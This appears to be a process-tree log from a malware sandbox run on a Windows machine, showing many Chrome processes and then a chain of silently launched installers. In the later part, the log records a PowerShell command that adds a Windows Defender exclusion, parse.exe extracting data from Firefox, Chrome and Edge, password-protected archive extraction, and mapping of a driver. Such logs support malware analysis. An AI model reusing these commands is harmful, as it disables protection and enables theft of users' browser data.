C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2688 /prefetch:111⤵PID:420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:111⤵PID:5420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:111⤵PID:6188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:111⤵PID:6464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:111⤵PID:6400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3976 /prefetch:811⤵PID:6920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4160 /prefetch:811⤵PID:3788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4244 /prefetch:811⤵PID:7200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5216 /prefetch:811⤵PID:7416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5080 /prefetch:811⤵PID:7408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3508 /prefetch:811⤵PID:8052
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings11⤵PID:8044
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6ec167740,0x7ff6ec167750,0x7ff6ec16776012⤵PID:8080
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3844 /prefetch:811⤵PID:8180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3940 /prefetch:811⤵PID:7196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4324 /prefetch:811⤵PID:6200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5064 /prefetch:811⤵PID:5104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3356 /prefetch:811⤵PID:7232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4776 /prefetch:811⤵PID:5824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4712 /prefetch:811⤵PID:4044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4696 /prefetch:811⤵PID:2828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3908 /prefetch:811⤵PID:7592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3832 /prefetch:811⤵PID:7376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1660 /prefetch:811⤵PID:7468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:811⤵PID:6800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4120 /prefetch:811⤵PID:1468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4728 /prefetch:811⤵PID:964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4484 /prefetch:811⤵PID:5212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2336 /prefetch:811⤵PID:6116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1756 /prefetch:811⤵PID:5904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3856 /prefetch:811⤵PID:5420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3924 /prefetch:811⤵PID:8064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:811⤵PID:7352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3872 /prefetch:811⤵PID:8100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:811⤵PID:7648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:111⤵PID:4424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4596 /prefetch:811⤵PID:7556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2372 /prefetch:811⤵PID:7552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4428 /prefetch:811⤵PID:7164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:811⤵PID:5656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4284 /prefetch:811⤵PID:6920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1812 /prefetch:811⤵PID:6908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3936 /prefetch:811⤵PID:6544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4404 /prefetch:811⤵PID:8108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:111⤵PID:7372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4544 /prefetch:811⤵PID:6440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4144 /prefetch:811⤵PID:5772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3412 /prefetch:811⤵PID:7532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3896 /prefetch:811⤵PID:3612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5228 /prefetch:811⤵PID:6348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:111⤵PID:7596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3980 /prefetch:811⤵PID:7216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1664 /prefetch:811⤵PID:5904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5700 /prefetch:811⤵PID:7344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=5020 /prefetch:211⤵PID:6492
-
C:\Users\Admin\AppData\Local\Temp\is-MG5JP.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-MG5JP.tmp\chashepro3.tmp" /SL5="$80658,2015144,58368,C:\Users\Admin\AppData\Local\Temp\hyfqtbi4hzd\chashepro3.exe" /VERYSILENT12⤵PID:296
-
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg7⤵
- Runs .reg file with regedit
PID:6360
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b firefox7⤵PID:5444
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b chrome7⤵PID:4444
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b edge7⤵PID:6228
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\PictureLAb.exe" /Verysilent3⤵PID:6176
-
C:\Users\Admin\AppData\Local\Temp\is-2TQ7N.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-2TQ7N.tmp\PictureLAb.tmp" /SL5="$20490,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\PictureLAb.exe" /Verysilent4⤵PID:6216
-
C:\Users\Admin\AppData\Local\Temp\is-QTSDU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QTSDU.tmp\Setup.exe" /VERYSILENT5⤵PID:6852
-
C:\Users\Admin\AppData\Local\Temp\is-VHJ0G.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-VHJ0G.tmp\Setup.tmp" /SL5="$402B8,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-QTSDU.tmp\Setup.exe" /VERYSILENT6⤵PID:6872
-
C:\Users\Admin\AppData\Local\Temp\is-SC4FS.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-SC4FS.tmp\kkkk.exe" /S /UID=lab2147⤵PID:7888
-
C:\Program Files\Windows Mail\NLITMBENEF\prolab.exe"C:\Program Files\Windows Mail\NLITMBENEF\prolab.exe" /VERYSILENT8⤵PID:4912
-
C:\Users\Admin\AppData\Local\Temp\is-CNVSI.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-CNVSI.tmp\prolab.tmp" /SL5="$40546,575243,216576,C:\Program Files\Windows Mail\NLITMBENEF\prolab.exe" /VERYSILENT9⤵
- Suspicious use of SetWindowsHookEx
PID:4316
-
-
-
C:\Users\Admin\AppData\Local\Temp\f2-b7e4a-ee1-2d9a7-39a8911e80db5\Paevaenawoby.exe"C:\Users\Admin\AppData\Local\Temp\f2-b7e4a-ee1-2d9a7-39a8911e80db5\Paevaenawoby.exe"8⤵PID:6704
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y43eklil.nvs\GcleanerWW.exe /mixone & exit9⤵PID:7764
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tywlot05.c3s\privacytools5.exe & exit9⤵PID:6196
-
C:\Users\Admin\AppData\Local\Temp\tywlot05.c3s\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\tywlot05.c3s\privacytools5.exe10⤵PID:6588
-
C:\Users\Admin\AppData\Local\Temp\tywlot05.c3s\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\tywlot05.c3s\privacytools5.exe11⤵PID:7036
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fpdobw4o.24j\MultitimerFour.exe & exit9⤵PID:7724
-
C:\Users\Admin\AppData\Local\Temp\fpdobw4o.24j\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\fpdobw4o.24j\MultitimerFour.exe10⤵PID:7608
-
C:\Users\Admin\AppData\Local\Temp\4DE9ZIP89I\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4DE9ZIP89I\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10411⤵PID:5508
-
C:\Users\Admin\AppData\Local\Temp\4DE9ZIP89I\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4DE9ZIP89I\multitimer.exe" 1 3.1615014791.60432b87bd592 10412⤵PID:5424
-
C:\Users\Admin\AppData\Local\Temp\4DE9ZIP89I\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4DE9ZIP89I\multitimer.exe" 2 3.1615014791.60432b87bd59213⤵PID:6580
-
C:\Users\Admin\AppData\Local\Temp\ers5ouugiku\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ers5ouugiku\Setup3310.exe" /Verysilent /subid=57714⤵PID:5724
-
C:\Users\Admin\AppData\Local\Temp\is-EUT1I.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-EUT1I.tmp\Setup3310.tmp" /SL5="$604A8,802346,56832,C:\Users\Admin\AppData\Local\Temp\ers5ouugiku\Setup3310.exe" /Verysilent /subid=57715⤵PID:5544
-
C:\Users\Admin\AppData\Local\Temp\is-99M0E.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-99M0E.tmp\Setup.exe" /Verysilent16⤵PID:6460
-
C:\Users\Admin\AppData\Local\Temp\is-92AJC.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-92AJC.tmp\Setup.tmp" /SL5="$504FC,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-99M0E.tmp\Setup.exe" /Verysilent17⤵PID:7784
-
C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\ProPlugin.exe" /Verysilent18⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\is-IUH4H.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-IUH4H.tmp\ProPlugin.tmp" /SL5="$50536,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\ProPlugin.exe" /Verysilent19⤵PID:7088
-
C:\Users\Admin\AppData\Local\Temp\is-BTU36.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-BTU36.tmp\Setup.exe"20⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"21⤵PID:3748
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\PictureLAb.exe" /Verysilent18⤵PID:8056
-
C:\Users\Admin\AppData\Local\Temp\is-P632M.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-P632M.tmp\PictureLAb.tmp" /SL5="$1068C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\PictureLAb.exe" /Verysilent19⤵PID:7788
-
C:\Users\Admin\AppData\Local\Temp\is-QFS38.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QFS38.tmp\Setup.exe" /VERYSILENT20⤵PID:3204
-
C:\Users\Admin\AppData\Local\Temp\is-KF9B3.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-KF9B3.tmp\Setup.tmp" /SL5="$705C0,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-QFS38.tmp\Setup.exe" /VERYSILENT21⤵PID:4104
-
C:\Users\Admin\AppData\Local\Temp\is-0I0MB.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-0I0MB.tmp\kkkk.exe" /S /UID=lab21422⤵PID:6172
-
C:\Users\Admin\AppData\Local\Temp\6c-9188f-f3e-1a08d-678d1e8664739\Vilaxaeposhu.exe"C:\Users\Admin\AppData\Local\Temp\6c-9188f-f3e-1a08d-678d1e8664739\Vilaxaeposhu.exe"23⤵PID:6908
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\353olpmc.fjf\GcleanerWW.exe /mixone & exit24⤵PID:4364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jzapnzxw.5yr\privacytools5.exe & exit24⤵PID:8180
-
C:\Users\Admin\AppData\Local\Temp\jzapnzxw.5yr\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\jzapnzxw.5yr\privacytools5.exe25⤵PID:6876
-
C:\Users\Admin\AppData\Local\Temp\jzapnzxw.5yr\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\jzapnzxw.5yr\privacytools5.exe26⤵PID:6452
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mvujtcmj.nx2\setup.exe /8-2222 & exit24⤵PID:5520
-
C:\Users\Admin\AppData\Local\Temp\mvujtcmj.nx2\setup.exeC:\Users\Admin\AppData\Local\Temp\mvujtcmj.nx2\setup.exe /8-222225⤵PID:6208
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Holy-Wave"26⤵PID:6488
-
-
C:\Program Files (x86)\Holy-Wave\7za.exe"C:\Program Files (x86)\Holy-Wave\7za.exe" e -p154.61.71.51 winamp-plugins.7z26⤵PID:2800
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Holy-Wave\setup.exe" -map "C:\Program Files (x86)\Holy-Wave\WinmonProcessMonitor.sys""26⤵PID:8676
-
C:\Program Files (x86)\Holy-Wave\setup.exe"C:\Program Files (x86)\Holy-Wave\setup.exe" -map "C:\Program Files (x86)\Holy-Wave\WinmonProcessMonitor.sys"27⤵PID:9280
-
-
-
C:\Program Files (x86)\Holy-Wave\7za.exe"C:\Program Files (x86)\Holy-Wave\7za.exe" e -p154.61.71.51 winamp.7z26⤵PID:9876
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d0p3u3r3.bjh\MultitimerFour.exe & exit24⤵PID:6524
-
